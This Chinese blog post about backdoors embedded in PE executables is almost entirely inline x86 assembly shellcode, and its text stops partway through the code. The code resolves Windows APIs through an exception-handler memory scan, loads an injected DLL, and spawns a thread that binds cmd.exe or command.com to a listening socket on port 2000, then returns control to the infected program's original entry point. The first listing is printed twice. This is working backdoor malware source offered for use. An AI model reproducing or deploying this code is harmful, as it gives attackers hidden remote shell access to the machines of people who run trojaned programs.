本文主要是介绍PE可执行文件的镶入式程序后门开发,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
PE可执行文件的镶入式程序后门开发
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- */
- #include
- #include
- main()
- {
-
- _asm
- {
- call ex//取得当前地址以计算异常结构开始的地址
- mov eax,0x77000000
- mov [ebp-0ch],eax
- mov eax,esp
- sub eax,8
- xchg fs:[0],eax
- mov DWORD ptr[ebp-00h],eax
- mov eax,fs:[4]
- mov DWORD ptr[ebp-04h],eax
- mov fs:[4h],ebp//保存ebp到fs:[4h]中
- add ecx,34h
- push ecx
- push eax
- mov edx,0
- mov byte ptr [edx],0//产生错误
- }
-
-
- //异常结构开始
- _asm
- {
- mov ebp,fs:[4]
- mov dword ptr [ebp-8h],0
- //for(;imgbase<0xff000000,procgetadd==0;){
- e104f:
- cmp dword ptr [ebp-8h],0
- jne exi
- //imgbase+=0x10000;
- mov eax,[ebp-0ch]
- add eax,10000h
- mov [ebp-0ch],eax
- //if(imgbase==0x78000000) imgbase=0xbff00000;
- cmp dword ptr [ebp-0ch],78000000h
- jne is44
- mov dword ptr [ebp-0ch],0BFF00000h
-
- /*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
- *)(imgbase+0x3c))=='EP'){*/
-
- is44:
-
- mov ecx,dword ptr [ebp-0ch]
- xor edx,edx
- mov dx,word ptr [ecx]
- mov dword ptr [ebp-24h],ecx
- cmp edx,5A4Dh//ZM
- jne e11db
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+3Ch]
- mov edx,dword ptr [ebp-0ch]
- xor eax,eax
- mov ax,word ptr [edx+ecx]
- cmp eax,4550h
- jne e11db
-
- //fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
- mov ecx,dword ptr [ebp-0ch]
- mov edx,dword ptr [ecx+3Ch]
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+edx+78h]
- add ecx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-10h],ecx
- // k=*(int *)(fnbase+0xc)+imgbase;
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+0Ch]
- add eax,dword ptr [ebp-0ch]
- mov dword ptr [ebp-14h],eax
-
- //if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
- mov ecx,dword ptr [ebp-14h]
- cmp dword ptr [ecx],4E52454Bh
- jne e11db
- mov edx,dword ptr [ebp-14h]
- cmp dword ptr [edx+4],32334C45h
- jne e11db
- //k=imgbase+*(int *)(fnbase+0x20);
- mov eax,dword ptr [ebp-10h]
- mov ecx,dword ptr [ebp-0ch]
- add ecx,dword ptr [eax+20h]
- mov dword ptr [ebp-14h],ecx
- //for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
- mov dword ptr [ebp-18h],0
- jmp e1127
- e1115:
- mov edx,dword ptr [ebp-18h]
- add edx,1
- mov dword ptr [ebp-18h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,4
- mov dword ptr [ebp-14h],eax
- e1127:
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ebp-18h]
- cmp edx,dword ptr [ecx+18h]
- jge e11db
- /*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
- *)k)=='corP'){GetProcAddress*/
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx],'PteG'
- jne e11d6
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx+4],'Acor'
- jne e11d6
- //k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
- mov eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+24h]
- xor ecx,ecx
- mov cx,word ptr [eax+edx]
- mov dword ptr [ebp-14h],ecx
- //k+=*(int *)(fnbase+0x10)-1;
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+10h]
- mov ecx,dword ptr [ebp-14h]
- lea edx,dword ptr [ecx+eax-1]
- mov dword ptr [ebp-14h],edx
- //k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
- mov eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+1Ch]
- mov eax,dword ptr [eax+edx]
- mov dword ptr [ebp-14h],eax
- mov edx,dword ptr [ebp-14h]
- //add edx,imgbase
- add edx,dword ptr [ebp-0ch]
- // mov procgetadd,edx
- mov dword ptr [ebp-8h],edx
-
- //恢复异常结构
-
- mov eax,DWORD ptr[ebp-00h]
- mov fs:[0],eax
- mov eax,DWORD ptr[ebp-04h]
- mov fs:[4],eax
-
- jmp e11db
- e11d6:
- jmp e1115
- e11db:
- jmp e104f
-
-
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得LoadLibraryA入口地址
-
- _asm
- {
- mov dword ptr [ebp-124h],'daoL'
- mov dword ptr [ebp-120h],'rbiL'
- mov dword ptr [ebp-11Ch],'Ayra'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
- push ebx
- mov eax,dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
- call eax
- mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
- }
-
- //加载 mydll.dll
-
- _asm
- {
- mov dword ptr [ebp-124h],'ldym'
- mov dword ptr [ebp-120h],'ld.l'
- mov dword ptr [ebp-11Ch],'l'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
-
- //取得mybegin入口地址
-
- mov dword ptr [ebp-124h],'gebM'
- mov dword ptr [ebp-120h],'ni'
- mov dword ptr [ebp-11Ch],0000h
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-4008h]
- mov dword ptr [ebp-4030h],eax//mybegin入口地址
- cmp eax,0
- jz exit1
- call eax //执行mybegin
- jmp exit1
- }
-
- ex:
- _asm
- {
- pop ecx
- push ecx
- ret
- }
- exit1:
-
- _asm
- {
- mov eax,0x401000 //这个跳转地址在代码中需要更改
- jmp eax
- }
- return 0;
- }
/*
利用异常结构处理搜索GetProcAddress入口地址
*/
#include
#include
main()
{
_asm
{
call ex//取得当前地址以计算异常结构开始的地址
mov eax,0x77000000
mov [ebp-0ch],eax
mov eax,esp
sub eax,8
xchg fs:[0],eax
mov DWORD ptr[ebp-00h],eax
mov eax,fs:[4]
mov DWORD ptr[ebp-04h],eax
mov fs:[4h],ebp//保存ebp到fs:[4h]中
add ecx,34h
push ecx
push eax
mov edx,0
mov byte ptr [edx],0//产生错误
}
//异常结构开始
_asm
{
mov ebp,fs:[4]
mov dword ptr [ebp-8h],0
//for(;imgbase<0xff000000,procgetadd==0;){
e104f:
cmp dword ptr [ebp-8h],0
jne exi
//imgbase+=0x10000;
mov eax,[ebp-0ch]
add eax,10000h
mov [ebp-0ch],eax
//if(imgbase==0x78000000) imgbase=0xbff00000;
cmp dword ptr [ebp-0ch],78000000h
jne is44
mov dword ptr [ebp-0ch],0BFF00000h
/*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){*/
is44:
mov ecx,dword ptr [ebp-0ch]
xor edx,edx
mov dx,word ptr [ecx]
mov dword ptr [ebp-24h],ecx
cmp edx,5A4Dh//ZM
jne e11db
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+3Ch]
mov edx,dword ptr [ebp-0ch]
xor eax,eax
mov ax,word ptr [edx+ecx]
cmp eax,4550h
jne e11db
//fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
mov ecx,dword ptr [ebp-0ch]
mov edx,dword ptr [ecx+3Ch]
mov eax,[ebp-0ch]
mov ecx,dword ptr [eax+edx+78h]
add ecx,dword ptr [ebp-0ch]
mov dword ptr [ebp-10h],ecx
// k=*(int *)(fnbase+0xc)+imgbase;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+0Ch]
add eax,dword ptr [ebp-0ch]
mov dword ptr [ebp-14h],eax
//if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
mov ecx,dword ptr [ebp-14h]
cmp dword ptr [ecx],4E52454Bh
jne e11db
mov edx,dword ptr [ebp-14h]
cmp dword ptr [edx+4],32334C45h
jne e11db
//k=imgbase+*(int *)(fnbase+0x20);
mov eax,dword ptr [ebp-10h]
mov ecx,dword ptr [ebp-0ch]
add ecx,dword ptr [eax+20h]
mov dword ptr [ebp-14h],ecx
//for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
mov dword ptr [ebp-18h],0
jmp e1127
e1115:
mov edx,dword ptr [ebp-18h]
add edx,1
mov dword ptr [ebp-18h],edx
mov eax,dword ptr [ebp-14h]
add eax,4
mov dword ptr [ebp-14h],eax
e1127:
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ebp-18h]
cmp edx,dword ptr [ecx+18h]
jge e11db
/*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
*)k)=='corP'){GetProcAddress*/
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx],'PteG'
jne e11d6
mov eax,dword ptr [ebp-14h]
mov ecx,dword ptr [eax]
mov edx,dword ptr [ebp-0ch]
cmp dword ptr [edx+ecx+4],'Acor'
jne e11d6
//k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
mov eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-18h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+24h]
xor ecx,ecx
mov cx,word ptr [eax+edx]
mov dword ptr [ebp-14h],ecx
//k+=*(int *)(fnbase+0x10)-1;
mov edx,dword ptr [ebp-10h]
mov eax,dword ptr [edx+10h]
mov ecx,dword ptr [ebp-14h]
lea edx,dword ptr [ecx+eax-1]
mov dword ptr [ebp-14h],edx
//k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
mov eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-14h]
add eax,dword ptr [ebp-0ch]
mov ecx,dword ptr [ebp-10h]
mov edx,dword ptr [ecx+1Ch]
mov eax,dword ptr [eax+edx]
mov dword ptr [ebp-14h],eax
mov edx,dword ptr [ebp-14h]
//add edx,imgbase
add edx,dword ptr [ebp-0ch]
// mov procgetadd,edx
mov dword ptr [ebp-8h],edx
//恢复异常结构
mov eax,DWORD ptr[ebp-00h]
mov fs:[0],eax
mov eax,DWORD ptr[ebp-04h]
mov fs:[4],eax
jmp e11db
e11d6:
jmp e1115
e11db:
jmp e104f
}
//////////////////////////////////////////////////////////////
exi:
//取得LoadLibraryA入口地址
_asm
{
mov dword ptr [ebp-124h],'daoL'
mov dword ptr [ebp-120h],'rbiL'
mov dword ptr [ebp-11Ch],'Ayra'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
push ebx
mov eax,dword ptr [ebp-8h]
mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
call eax
mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
}
//加载 mydll.dll
_asm
{
mov dword ptr [ebp-124h],'ldym'
mov dword ptr [ebp-120h],'ld.l'
mov dword ptr [ebp-11Ch],'l'
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
call dword ptr [ebp-400ch]
cmp eax,0
jz exit1
mov ebx,eax
//取得mybegin入口地址
mov dword ptr [ebp-124h],'gebM'
mov dword ptr [ebp-120h],'ni'
mov dword ptr [ebp-11Ch],0000h
mov dword ptr [ebp-118h],0000h
lea eax,[ebp-124h]
push eax
push ebx
call dword ptr [ebp-4008h]
mov dword ptr [ebp-4030h],eax//mybegin入口地址
cmp eax,0
jz exit1
call eax //执行mybegin
jmp exit1
}
ex:
_asm
{
pop ecx
push ecx
ret
}
exit1:
_asm
{
mov eax,0x401000 //这个跳转地址在代码中需要更改
jmp eax
}
return 0;
}
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- 然后用这个函数加载其他api函数.实现线程一个返回另一个
- 绑定cmd.exe或command.com功能
- */
- #include
- #include
- main()
- {
- _asm
- {
- call ex
- mov eax,0x77000000
- mov [ebp-0ch],eax
- mov eax,esp
- sub eax,8
- xchg fs:[0],eax
- mov DWORD ptr[ebp-00h],eax
- mov eax,fs:[4]
- mov DWORD ptr[ebp-04h],eax
- mov fs:[4h],ebp
- add ecx,34h
- push ecx
- push eax
- mov edx,0
- mov byte ptr [edx],0
- mov ebp,fs:[4]
- mov dword ptr [ebp-8h],0
- e104f:
- cmp dword ptr [ebp-8h],0
- jne exi
- mov eax,[ebp-0ch]
- add eax,10000h
- mov [ebp-0ch],eax
- cmp dword ptr [ebp-0ch],78000000h
- jne is44
- mov dword ptr [ebp-0ch],0BFF00000h
- is44:
- mov ecx,dword ptr [ebp-0ch]
- xor edx,edx
- mov dx,word ptr [ecx]
- mov dword ptr [ebp-24h],ecx
- cmp edx,5A4Dh//ZM
- jne e11db
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+3Ch]
- mov edx,dword ptr [ebp-0ch]
- xor eax,eax
- mov ax,word ptr [edx+ecx]
- cmp eax,4550h
- jne e11db
- mov ecx,dword ptr [ebp-0ch]
- mov edx,dword ptr [ecx+3Ch]
- mov eax,[ebp-0ch]
- mov ecx,dword ptr [eax+edx+78h]
- add ecx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-10h],ecx
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+0Ch]
- add eax,dword ptr [ebp-0ch]
- mov dword ptr [ebp-14h],eax
- mov ecx,dword ptr [ebp-14h]
- cmp dword ptr [ecx],4E52454Bh
- jne e11db
- mov edx,dword ptr [ebp-14h]
- cmp dword ptr [edx+4],32334C45h
- jne e11db
- mov eax,dword ptr [ebp-10h]
- mov ecx,dword ptr [ebp-0ch]
- add ecx,dword ptr [eax+20h]
- mov dword ptr [ebp-14h],ecx
- mov dword ptr [ebp-18h],0
- jmp e1127
- e1115:
- mov edx,dword ptr [ebp-18h]
- add edx,1
- mov dword ptr [ebp-18h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,4
- mov dword ptr [ebp-14h],eax
- e1127:
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ebp-18h]
- cmp edx,dword ptr [ecx+18h]
- jge e11db
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx],'PteG'
- jne e11d6
- mov eax,dword ptr [ebp-14h]
- mov ecx,dword ptr [eax]
- mov edx,dword ptr [ebp-0ch]
- cmp dword ptr [edx+ecx+4],'Acor'
- jne e11d6
- mov eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-18h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+24h]
- xor ecx,ecx
- mov cx,word ptr [eax+edx]
- mov dword ptr [ebp-14h],ecx
- mov edx,dword ptr [ebp-10h]
- mov eax,dword ptr [edx+10h]
- mov ecx,dword ptr [ebp-14h]
- lea edx,dword ptr [ecx+eax-1]
- mov dword ptr [ebp-14h],edx
- mov eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-14h]
- add eax,dword ptr [ebp-0ch]
- mov ecx,dword ptr [ebp-10h]
- mov edx,dword ptr [ecx+1Ch]
- mov eax,dword ptr [eax+edx]
- mov dword ptr [ebp-14h],eax
- mov edx,dword ptr [ebp-14h]
- add edx,dword ptr [ebp-0ch]
- mov dword ptr [ebp-8h],edx
- //恢复异常结构
- mov eax,DWORD ptr[ebp-00h]
- mov fs:[0],eax
- mov eax,DWORD ptr[ebp-04h]
- mov fs:[4],eax
- jmp e11db
- e11d6:
- jmp e1115
- e11db:
- jmp e104f
-
- }
-
- //////////////////////////////////////////////////////////////
-
- exi:
-
- //取得各个需要函数的地址
-
- //取得LoadLibraryA入口地址
- _asm
-
- {
- call ex1
- mov dword ptr [ecx-0C70h],ebp
- mov dword ptr [ebp-124h],'daoL'
- mov dword ptr [ebp-120h],'rbiL'
- mov dword ptr [ebp-11Ch],'Ayra'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
- push ebx
- mov eax,dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
- call eax
- mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
-
- //CreatePipe入口地址
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'iPet'
- mov dword ptr [ebp-11Ch],'ep'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4000h],eax//CreatePipe入口地址
- cmp eax,0
- jz exit1
-
- //GetVersion入口地址
-
- mov dword ptr [ebp-124h],'VteG'
- mov dword ptr [ebp-120h],'isre'
- mov dword ptr [ebp-11Ch],'no'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4004h],eax//GetVersion 入口地址
- cmp eax,0
- jz exit1
-
- //CloseHandle入口地址
-
- mov dword ptr [ebp-124h],'solC'
- mov dword ptr [ebp-120h],'naHe'
- mov dword ptr [ebp-11Ch],'eld'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4010h],eax//CloseHandle 入口地址
- cmp eax,0
- jz exit1
-
- //ExitThread入口地址
-
- mov dword ptr [ebp-124h],'tixE'
- mov dword ptr [ebp-120h],'erhT'
- mov dword ptr [ebp-11Ch],'da'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4014h],eax//ExitThread入口地址
- cmp eax,0
- jz exit1
-
- //Sleep入口地址
-
- mov dword ptr [ebp-124h],'eelS'
- mov dword ptr [ebp-120h],'p'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4018h],eax//Sleep入口地址
- cmp eax,0
- jz exit1
-
- //WriteFile入口地址
-
- mov dword ptr [ebp-124h],'tirW'
- mov dword ptr [ebp-120h],'liFe'
- mov dword ptr [ebp-11Ch],'e'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-401Ch],eax//WriteFile入口地址
- cmp eax,0
- jz exit1
-
- //PeekNamedPipe入口地址
-
- mov dword ptr [ebp-124h],'keeP'
- mov dword ptr [ebp-120h],'emaN'
- mov dword ptr [ebp-11Ch],'piPd'
- mov dword ptr [ebp-118h],'e'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4020h],eax//PeekNamedPipe入口地址
- cmp eax,0
- jz exit1
-
- //ReadFile入口地址
-
- mov dword ptr [ebp-124h],'daeR'
- mov dword ptr [ebp-120h],'eliF'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4024h],eax//ReadFile入口地址
- cmp eax,0
- jz exit1
-
- //GetStartupInfoA入口地址
-
- mov dword ptr [ebp-124h],'SteG'
- mov dword ptr [ebp-120h],'trat'
- mov dword ptr [ebp-11Ch],'nIpu'
- mov dword ptr [ebp-118h],'Aof'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4028h],eax//GetStartupInfoA入口地址
- cmp eax,0
- jz exit1
-
- //CreateProcessA入口地址
-
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'rPet'
- mov dword ptr [ebp-11Ch],'seco'
- mov dword ptr [ebp-118h],'As'
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-402Ch],eax//CreateProcessA入口地址
- cmp eax,0
- jz exit1
-
- //CreateThread入口地址
-
- mov dword ptr [ebp-124h],'aerC'
- mov dword ptr [ebp-120h],'hTet'
- mov dword ptr [ebp-11Ch],'daer'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4008h],eax//CreateThread入口地址
- cmp eax,0
- jz exit1
- }
-
- //load wsock32.dll
- _asm
- {
- mov dword ptr [ebp-124h],'cosw'
- mov dword ptr [ebp-120h],'.23k'
- mov dword ptr [ebp-11Ch],'lld'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
-
- //WSAStartup入口地址
-
- mov dword ptr [ebp-124h],'SASW'
- mov dword ptr [ebp-120h],'trat'
- mov dword ptr [ebp-11Ch],'pu'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4030h],eax//WSAStartup入口地址
- cmp eax,0
- jz exit1
- //__WSAFDIsSet入口地址
- mov dword ptr [ebp-124h],'SW__'
- mov dword ptr [ebp-120h],'IDFA'
- mov dword ptr [ebp-11Ch],'teSs'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4034h],eax//__WSAFDIsSet入口地址
- cmp eax,0
- jz exit1
- //socket入口地址
- mov dword ptr [ebp-124h],'kcos'
- mov dword ptr [ebp-120h],'te'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4038h],eax//socket入口地址
- cmp eax,0
- jz exit1
- //closesocket入口地址
- mov dword ptr [ebp-124h],'solc'
- mov dword ptr [ebp-120h],'cose'
- mov dword ptr [ebp-11Ch],'tek'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-403Ch],eax//closesocket入口地址
- cmp eax,0
- jz exit1
- //select入口地址
- mov dword ptr [ebp-124h],'eles'
- mov dword ptr [ebp-120h],'tc'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4040h],eax//select入口地址
- cmp eax,0
- jz exit1
- //recv入口地址
- mov dword ptr [ebp-124h],'vcer'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4044h],eax//recv入口地址
- cmp eax,0
- jz exit1
- //send入口地址
- mov dword ptr [ebp-124h],'dnes'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4048h],eax//send入口地址
- cmp eax,0
- jz exit1
- //htons入口地址
- mov dword ptr [ebp-124h],'noth'
- mov dword ptr [ebp-120h],'s'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-404Ch],eax//htons入口地址
- cmp eax,0
- jz exit1
- //bind入口地址
- mov dword ptr [ebp-124h],'dnib'
- mov dword ptr [ebp-120h],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4050h],eax//bind入口地址
- cmp eax,0
- jz exit1
- //listen入口地址
- mov dword ptr [ebp-124h],'tsil'
- mov dword ptr [ebp-120h],'ne'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4054h],eax//listen入口地址
- cmp eax,0
- jz exit1
- //accept入口地址
- mov dword ptr [ebp-124h],'ecca'
- mov dword ptr [ebp-120h],'tp'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4058h],eax//accept入口地址
- cmp eax,0
- jz exit1
- }
- //load msvcrt.dll
- _asm
- {
- mov dword ptr [ebp-124h],'cvsm'
- mov dword ptr [ebp-120h],'d.tr'
- mov dword ptr [ebp-11Ch],'ll'
- mov dword ptr [ebp-118h],0000h
- lea eax,[ebp-124h]
- push eax
- call dword ptr [ebp-400ch]
- cmp eax,0
- jz exit1
- mov ebx,eax
- //memset入口地址
- mov dword ptr [ebp-124h],'smem'
- mov dword ptr [ebp-120h],'te'
- mov dword ptr [ebp-11Ch],0000h
- lea eax,[ebp-124h]
- push eax
- push ebx
- call dword ptr [ebp-8h]
- mov dword ptr [ebp-4090h],eax//memset入口地址
- cmp eax,0
- jz exit1
- }
-
- //////////////////////////////////////////////////////////////
-
- //建立后门线程
-
- /////////////////////////////////////////////////////////////
- _asm
- {
- call ex
- add ecx,32h //取得后门代码的地址
- mov dword ptr [ebp-8],1
- mov dword ptr [ebp-0Ch],0
- mov dword ptr [ebp-10h],0Ch
- lea eax,[ebp-4]
- push eax
- push 0
- push 0
- push ecx
- push 0
- lea ecx,[ebp-10h]
- push ecx
- call dword ptr [ebp-4008h]
- call exit1 //返回真正的代码
- }
- //////////////////////////////////////////////////////////////
- //建立后门
- /////////////////////////////////////////////////////////////
- _asm
- {
- mov eax,0x400
- call ex1
- mov ebp,dword ptr [ecx-0C70h]
- mov byte ptr [ebp-1340h],0Dh
- mov dword ptr [ebp-11ECh],0FFFFFFFFh
- mov dword ptr [ebp-1DCh],0
- mov dword ptr [ebp-1D8h],32h
- mov dword ptr [ebp-1E4h],10h
- call dword ptr [ebp-4004h]
- cmp eax,80000000h
- jnb loc_0040106C
- mov dword ptr [ebp-11ECh],1
- mov dword ptr [ebp-4118h],'.dmc'
- mov dword ptr [ebp-4114h],'exe'
- mov dword ptr [ebp-4110h],00000000h
- jmp loc_0040107D
- loc_0040106C:
- mov dword ptr [ebp-11ECh],0
- mov dword ptr [ebp-4118h],'mmoc'
- mov dword ptr [ebp-4114h],'.dna'
- mov dword ptr [ebp-4110h],'moc'
- loc_0040107D:
- lea eax,[ebp-1D4h]
- push eax
- push 101h
- call dword ptr [ebp-4030h]
- push 0
- push 1
- push 2
- call dword ptr [ebp-4038h]
- mov [ebp-30h],eax
- push 0
- push 1
- push 2
- call dword ptr [ebp-4038h]
- mov [ebp-12F8h],eax
- mov word ptr [ebp-28h],2
- push 7D0h
- call dword ptr [ebp-404Ch]
- mov [ebp-26h],ax
- mov dword ptr [ebp-24h],0
- mov dword ptr [ebp-44h],0Ch
- mov dword ptr [ebp-40h],0
- mov dword ptr [ebp-3Ch],1
- push 10h
- lea ecx,[ebp-28h]
- push ecx
- mov edx,[ebp-30h]
- push edx
- call dword ptr [ebp-4050h]
- push 2
- mov eax,[ebp-30h]
- push eax
- call dword ptr [ebp-4054h]
- loc_004010F7:
- lea ecx,[ebp-1E4h]
- push ecx
- lea edx,[ebp-28h]
- push edx
- mov eax,[ebp-30h]
- push eax
- call dword ptr [ebp-4058h]
- mov [ebp-12F8h],eax
- cmp dword ptr [ebp-12F8h],0FFFFFFFFh
- jnz loc_00401121
- xor eax,eax
- jmp loc_00401419
- loc_00401121:
- push 0
- lea ecx,[ebp-44h]
- push ecx
- lea edx,[ebp-34h]
- push edx
- lea eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4000h]
- test eax,eax
- jnz loc_00401140
- xor eax,eax
- jmp loc_00401419
- loc_00401140:
- push 0
- lea ecx,[ebp-44h]
- push ecx
- lea edx,[ebp-1E0h]
- push edx
- lea eax,[ebp-2Ch]
- push eax
- call dword ptr [ebp-4000h]
- push 44h
- push 0
- lea ecx,[ebp-133Ch]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- lea edx,[ebp-133Ch]
- push edx
- call dword ptr [ebp-4028h]
- mov dword ptr [ebp-133Ch],44h
- mov dword ptr [ebp-1310h],101h
- mov word ptr [ebp-130Ch],0
- mov eax,[ebp-34h]
- mov [ebp-12FCh],eax
- mov ecx,[ebp-2Ch]
- mov [ebp-1304h],ecx
- mov edx,[ebp-34h]
- mov [ebp-1300h],edx
- lea eax,[ebp-14h]
- push eax
- lea ecx,[ebp-133Ch]
- push ecx
- push 0
- push 0
- push 0
- push 1
- push 0
- push 0
- lea edx,[ebp-4118h]
- push edx
- push 0
